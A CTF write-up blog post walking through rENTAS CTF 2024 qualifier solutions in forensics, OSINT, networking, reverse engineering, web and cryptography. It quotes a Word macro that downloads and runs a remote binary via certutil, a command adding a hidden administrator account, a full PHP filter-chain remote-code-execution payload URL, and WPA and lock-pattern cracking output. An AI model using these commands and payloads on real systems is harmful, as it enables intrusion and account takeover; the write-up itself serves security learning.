Post

rENTAS CTF 2024 (Qualifiers) - Writeups

Posted Updated
By warlocksmurf 11 min read

This is a writeup for most challenges from rENTAS CTF 2024. This was the very first CTF in 2024 and together with my Sunway friends @Shen and @ren, we managed to qualify for the CTF finals. In my opinion, the CTF experience was overall very poor where challenges were really bad and guessy, hints were gatekept by authors for some reason, and the 24 hours CTF was organized on a weekday (sleep is for the weak right).

Mobile [Forensics]

Flag: RWSC{875463120}

We are given a report on a Android forensics case, specifically Lenovo P70. Before the hints were given, I actually read the reports slowly TWICE and found nothing of interest. I noticed several artifacts like photos of a car, photos of Malaysian guys, bootup screenshots, and several Android icon caches.

mobile1

With my last attempt, I was blessed with a hint from the authors with this video about cracking password patterns for an Android phone by analyzing its system files. So the hint was pretty obvious already, the password we are looking for is actually a password pattern, not a PIN or a password string.

mobile2

From the video, it seems that the gesture.key file is where password patterns are stored, however, Lenovo P70 does not have this file since it was not written anywhere on the report. So I did some research on Android forensics and found this interesting blog and found out that it is sometimes stored in /data/system/password.key. So I filtered /data/system in the report and found the hex values of the password patterns.

mobile3

Reading on how I can crack the hex values just like the guy in the video, I went online and found the perfect tool to crack the exact hash value 8e7e00c0bd5ce227f7be204c8b7c159669c776d4. After running the script, the flag can be obtained.

1
2
3
4
5
6
7
8
9
10
11

└─$ python gesturecrack.py -r 8e7e00c0bd5ce227f7be204c8b7c159669c776d4
   

        The Lock Pattern code is [8, 7, 5, 4, 6, 3, 1, 2, 0]

        For reference here is the grid (starting at 0 in the top left corner):

        |0|1|2|
        |3|4|5|
        |6|7|8|

Medellín Cartel [OSINT]

Flag: RWSC{Bl4cky_S1c4r1o}

We are given an image of the Medellín Cartel tree. No offence but this OSINT challenge was guessy, without the hints provided, I would have never know we should be looking for Nelson Hernandez and especially on a specific social media platform.

osint1

However, since we got the hint already, it was actually super simple. First find his Instagram profile, thank god he was the only person with blacky if not it will take awhile.

osint2

osint3

Inspecting the source code or “Instagram metadata”, the flag can be found. Overall, not a great OSINT challege compared to the next challenge.

osint4

Cali Cartel [OSINT]

Flag: RWSC{C4L1_C4RT3L_PWN3D}

We are given an image of a strange looking business operation (probably drugs). Reading the challenge name, it seems that I must be looking for information on the Cali Cartel.

cartel1

Doing some research on them, it seems that their downfall was caused by an insider betrayal, specifically from Jorge Salcedo. So I went ahead and lookup the betrayer’s name and got lucky when using Google Dorking.

cartel2

Hidden Discord [Misc]

Flag: RWSC{r34d_d15c0rd_d3v3l0p3r_API_r3f3r3nc3}

We are given a link to join a Discord server (https://discord.gg/7aMtftbDY4). Inside the server, the admin mentioned that there are 5 parts of the flag throughout the server.

discord1

Part 1 of the flag was easily noticed in the chat room of the voice channel. Similarly, part 3 can be easily found in the events tab.

discord2

discord3

While getting the flag parts we actually can find several hints placed in the Discord server.

1
2

Find the CATegory? 🐈‍⬛🐈
roles ❓

For part 2 and 4, my teammate @Shen helped find them with special plugins. After finding this video about a plugin with BetterDiscord to see hidden channels, he managed to get part 2 and 4 of the flag.

discord4

For the last part of the flag, it is in the server icon. So just use Discord on browser and inspect the icon and change the size of it.

1

https://cdn.discordapp.com/icons/1202263455466541096/bfa6d5f2ed8067d3367791ed5b4d6941.webp?size=1024

discord5

Last Hope [Networking]

Flag: RWSC{anonymous}

We are given a pcap file consisting of only wireless packets. Since the flag is the user’s password, it was obvious we had to crack the password with aircrack-ng.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47

└─$ aircrack-ng RAWSECWIFI-01.cap -w /usr/share/wordlists/rockyou.txt
Reading packets, please wait...
Opening RAWSECWIFI-01.cap
Resetting EAPOL Handshake decoder state.
Resetting EAPOL Handshake decoder state.
Resetting EAPOL Handshake decoder state.
Resetting EAPOL Handshake decoder state.
Resetting EAPOL Handshake decoder state.
Read 25995 packets.

   #  BSSID              ESSID                     Encryption

   1  7E:7F:A3:4C:5C:1A  Rawsec Command Center     WPA (1 handshake)

Choosing first network as target.

Reading packets, please wait...
Opening RAWSECWIFI-01.cap
Resetting EAPOL Handshake decoder state.
Resetting EAPOL Handshake decoder state.
Resetting EAPOL Handshake decoder state.
Resetting EAPOL Handshake decoder state.
Resetting EAPOL Handshake decoder state.
Read 25995 packets.

1 potential targets


                               Aircrack-ng 1.7 

      [00:00:05] 6108/14344392 keys tested (1126.36 k/s) 

      Time left: 3 hours, 32 minutes, 9 seconds                  0.04%

                           KEY FOUND! [ anonymous ]


      Master Key     : 94 7D 53 8E F7 F3 22 52 BC 89 D4 B7 DB BE 77 E3 
                       A7 A8 D2 89 9A 1B 58 43 84 E3 4A 52 D5 90 BB F5 

      Transient Key  : 8E 41 35 02 02 91 DD EA AE 6F 04 1C 93 7E 66 D7 
                       DB 2C 1E 13 D7 54 9E 77 83 D3 F2 1E 08 62 9B 59 
                       53 12 38 DA 5E E0 50 BF 70 52 31 67 F9 69 91 DD 
                       FF 54 08 E1 59 37 92 F9 12 5E D6 1B 3F FE 43 AC 

      EAPOL HMAC     : 59 CD 37 EF 5A E7 87 0E 76 54 AE E6 44 CB 90 7E

Скорпион [Threat Hunt]

Flag: RWSC{rhysidafc6lm7qa2mkiukbezh7zuth3i4wof4mh2audkymscjm6yegad}

We are given a text file about a real ransomware.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

In one investigation, xxxxxxx actors created two folders in the C:\ drive labeled in and out, which served as a staging directory (central location) for hosting malicious executables. he in folder contained file names in accordance with host names on the victim’s network, likely imported through a scanning tool. The out folder contained various files listed in Table 2 below. For encryption process - After mapping the network, the ransomware encrypts data using a 4096-bit RSA encryption key with a ChaCha20 algorithm. The algorithm features a 256-bit key, a 32-bit counter, and a 96-bit nonce along with a four-by-four matrix of 32-bit words in plain text. Registry modification commands are not obfuscated, displayed as plain-text strings and executed via cmd.exe. The encryptor allows arguments -d (select a directory) and -sr (file deletion), defined by the authors of the code as parseOptions. After the lines of binary strings complete their tasks, they delete themselves through the control panel to evade detection.

Table 2: Malicious Executables Affiliated with xxxxxxx Infections

conhost.exe
6633fa85bb234a75927b23417313e51a4c155e12f71da3959e168851a600b010
A ransomware binary.

psexec.exe
078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b
A file used to execute a process on a remote or local host.

S_0.bat
1c4978cd5d750a2985da9b58db137fc74d28422f1e087fd77642faa7efe7b597
A batch script likely used to place 1.ps1 on victim systems for ransomware staging purposes [T1059.003].

1.ps1
4e34b9442f825a16d7f6557193426ae7a18899ed46d3b896f6e4357367276183
Identifies an extension block list of files to encrypt and not encrypt.

S_1.bat
97766464d0f2f91b82b557ac656ab82e15cae7896b1d8c98632ca53c15cf06c4
A batch script that copies conhost.exe (the encryption binary) on an imported list of host names within the C:\Windows\Temp directory of each system.

S_2.bat
918784e25bd24192ce4e999538be96898558660659e3c624a5f27857784cd7e1
Executes conhost.exe on compromised victim systems, which encrypts and appends the extension of .groupname(sensored) across the environment.

Reading it, it seems that they are referring to a pretty recent ransomware called Rhysida. I found a blog that talks about it and also all the C2 IPs it connects to. I also found out that they operate in the Dark Web where they sell the information they stole from victims.

<img src="/assets/posts/rentasctf2024/th1.png" width=50% height=50%>

This was kind of guessy cause no where in the question mentioned Telegram, but after receiving the hint, I went on Telegram and search Rhysida and found a chat room with a sameple flag.

<img src="/assets/posts/rentasctf2024/th2.jpg" width=50% height=50%>

Reading the chat, it seems that the flag is the mirror link of their onion page. This can be obtained in many sources like this.

PS: Random stuff I encountered:

  • I found out the ransomware also attacked Indah Water Konsortium in Malaysia.
  • I messaged a random Telegram bot when finding the chat room.

Resign Letter [Rev]

Flag: RWSC{p@ss123}

We are given a weird document template file created by Microsoft Word. When opening it, macros can be found.

rev1

Opening the macro named Test as shown below provides us with the following code.

rev2

1
2

Shell ("cmd /c certutil.exe -urlcache -split -f https://github.com/fareedfauzi/Adv_Sim/raw/main/lenovo.exe %temp%\lenovo.exe")
Shell ("cmd /c %temp%\lenovo.exe")

Downloading the mallicious binary and using strings, we can see that it executes:

1

cmd.exe /c net user f14g cEBzczEyMw== /ADD && net localgroup Administrators f14g /ADD

It tries to add the user f14g with password cEBzczEyMw== to the local machine and add it to the Administrators group. Decode the password with base64 for the flag.

Bring Your Own Script [Web]

Flag: RWSC{J4CKP0T}

We are given a website that has multiple directories and the flag should be located in one of them. A script can be created to brute force each path and found out the flag was actually an image.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin
from urllib.parse import unquote
visited_links = set()

def get_links(url):
    try:
        response = requests.get(url)
        soup = BeautifulSoup(response.text, 'html.parser')
        links = soup.find_all('a', href=True)
        return [urljoin(url, link['href']) for link in links]
    except requests.exceptions.RequestException as e:
        print(f"Error retrieving links from {url}: {e}")
        return []

def no_directories_found(soup):
    return "No directories found." not in soup.get_text() and not soup.find_all(class_="directory-link")

def visit_links_recursive(url):
    if url in visited_links:
        return

    print(f"Visiting: {unquote(url)}")

    try:
        response = requests.get(url)
        soup = BeautifulSoup(response.text, 'html.parser')

        if no_directories_found(soup):
            print(f"Flag on: {url}")
            exit()

        visited_links.add(url)

        links = get_links(url)

        for link in links:
            visit_links_recursive(link)

    except requests.exceptions.RequestException as e:
        print(f"Error visiting {url}: {e}")

def main():
    starting_url = 'https://byos.ctf.rawsec.com/root/'
    visit_links_recursive(starting_url)

if __name__ == "__main__":
    main()

1
2
3
4
5
6
7
8
9
10
11
12

...
Visiting: https://byos.ctf.rawsec.com/root/🤤🤕😃/😌/🥺😄/🤒🤯🤕/index.php
Visiting: https://byos.ctf.rawsec.com/root/🤤🤕😃/😌/🥺😄/🤒🤯🤕/😏/index.php
Visiting: https://byos.ctf.rawsec.com/root/🤤🤕😃/😔😁😕😵/index.php
Visiting: https://byos.ctf.rawsec.com/root/🤤🤕😃/😔😁😕😵/😺😪🥴😇/index.php
Visiting: https://byos.ctf.rawsec.com/root/🤤🤕😃/😔😁😕😵/😺😪🥴😇/😳🤕/index.php
Visiting: https://byos.ctf.rawsec.com/root/🤤🤕😃/😔😁😕😵/😺😪🥴😇/😳🤕/👾/index.php
Visiting: https://byos.ctf.rawsec.com/root/🤤🤕😃/😔😁😕😵/😺😪🥴😇/🥰🥶🤣😂/index.php
Visiting: https://byos.ctf.rawsec.com/root/🤤🤕😃/😔😁😕😵/😺😪🥴😇/🥰🥶🤣😂/😅/index.php
Visiting: https://byos.ctf.rawsec.com/root/🤤🤕😃/😔😁😕😵/😺😪🥴😇/🥰🥶🤣😂/😅😡/index.php
Visiting: https://byos.ctf.rawsec.com/root/🤤🤕😃/😔😁😕😵/😺😪🥴😇/🥰🥶🤣😂/🤧😅/index.php
Flag on: https://byos.ctf.rawsec.com/root/%F0%9F%A4%A4%F0%9F%A4%95%F0%9F%98%83/%F0%9F%98%94%F0%9F%98%81%F0%9F%98%95%F0%9F%98%B5/%F0%9F%98%BA%F0%9F%98%AA%F0%9F%A5%B4%F0%9F%98%87/%F0%9F%A5%B0%F0%9F%A5%B6%F0%9F%A4%A3%F0%9F%98%82/%F0%9F%A4%A7%F0%9F%98%85/index.php

web1

simplelazy [Web]

Flag: RWSC{S1MPL3_4ND_L4ZY}

We are given a PHP website that loads files through a GET parameter. A vulnerablity in PHP exists where RCE can be achieved if the attacker controls a path to used in include() which is the method the website uses to include files.

web2

web3

We can use a PHP filter chain generator script

Command payload

1
2

python script.py --chain "<?php system('cat e* | base64');?>"
https://simplelazy.ctf.rawsec.com/index.php?page=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88594.UTF16|convert.iconv.IBM5347.UCS4|convert.iconv.UTF32BE.MS936|convert.iconv.OSF00010004.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

web4

La Itu Je! [Web] 🩸

Flag: RWSC{b045887cbadfda25b29db243a18de38cb1cbfb14}

We are given a website that has a login form. First, register an account under /register.php (the endpoint can be fuzzed or located in a comment on the login page).

web5

Accessing the get flag endpoint will require a code to be submitted. Vieweing the page source, we can find an obsfucated js file which reveals that we have to send a POST request to dashboard.php to get a valid code.

web6

After, we were stuck and only once hints were released we solved the chal. The server will curl the value in the Host paramater. After getting the correct code, we can inject our server into the Host header to receive the flag.

web7

web8

web9

Shoutout to @Shen for the first blood!

fb

round and round [Cryptography]

Flag: RWSC{PIZZINI_CIPHER_WAS_EAZY}

We are given a ciphertext of 2126226{19122929121712_6121911821_26422_842928}. Since we know the flag format, can assume that RWSC = 2126226. Looking at this logic for awhile, he noticed that the numbers could act as hex values instead where an extra 0 is appended to 6. Example: 21 26 22 06 So he made a script to build the flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

test = "21 26 22 06".split()
a = "19 12 29 29 12 17 12".split()
b = "06 12 19 11 08 21".split()
c = "26 04 22".split()
d = "08 04 29 28".split()

for i in test:
    print(chr(int(i)+61),end="")
print("_",end="")

for i in a:
    print(chr(int(i)+61),end="")
print("_",end="")

for i in b:
    print(chr(int(i)+61),end="")
print("_",end="")

for i in c:
    print(chr(int(i)+61),end="")
print("_",end="")

for i in d:
    print(chr(int(i)+61),end="")
print("_",end="")

print()

1
2

└─$ python pizza.py 
RWSC_PIZZINI_CIPHER_WAS_EAZY_

Scoreboard

Team HLG

hlg

ctf
forensics osint misc networking threathunt rev web cryptography local
This post is licensed under CC BY 4.0 by the author.